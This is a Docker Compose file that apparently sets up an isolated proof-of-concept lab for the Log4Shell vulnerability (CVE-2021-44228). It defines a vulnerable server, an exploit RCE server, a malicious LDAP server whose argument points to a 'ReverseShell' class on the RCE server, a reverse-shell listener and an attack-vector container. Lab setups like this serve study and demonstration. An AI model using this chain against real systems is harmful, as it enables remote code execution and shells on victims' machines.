version: '3'


services:

    log4shell-server:                                       # Vulnerable server
        build: log4shell-server
        image: cve-2021-44228-poc/log4shell-server
        container_name: log4shell-server
        # ports:
        #     - '8080:8080'
        restart: always

    rce-server:                                             # Exploit RCE server
        build: rce-server
        image: cve-2021-44228-poc/rce-server
        container_name: rce-server
        # ports:
        #     - '3000:3000'
        restart: always

    ldap-server:                                            # Malicious LDAP server
        build: ldap-server
        image: cve-2021-44228-poc/ldap-server
        container_name: ldap-server
        # ports:
        #     - '1389:1389'
        command:
            - 'http://rce-server:3000/#ReverseShell'        # RCE server & class argument
        restart: always

    reverse-shell:
        build: reverse-shell
        image: cve-2021-44228-poc/reverse-shell
        container_name: reverse-shell
        hostname: reverse-shell
        # ports:
        #     - '4242:4242'

    attack-vector:
        build: attack-vector
        image: cve-2021-44228-poc/attack-vector
        container_name: attack-vector
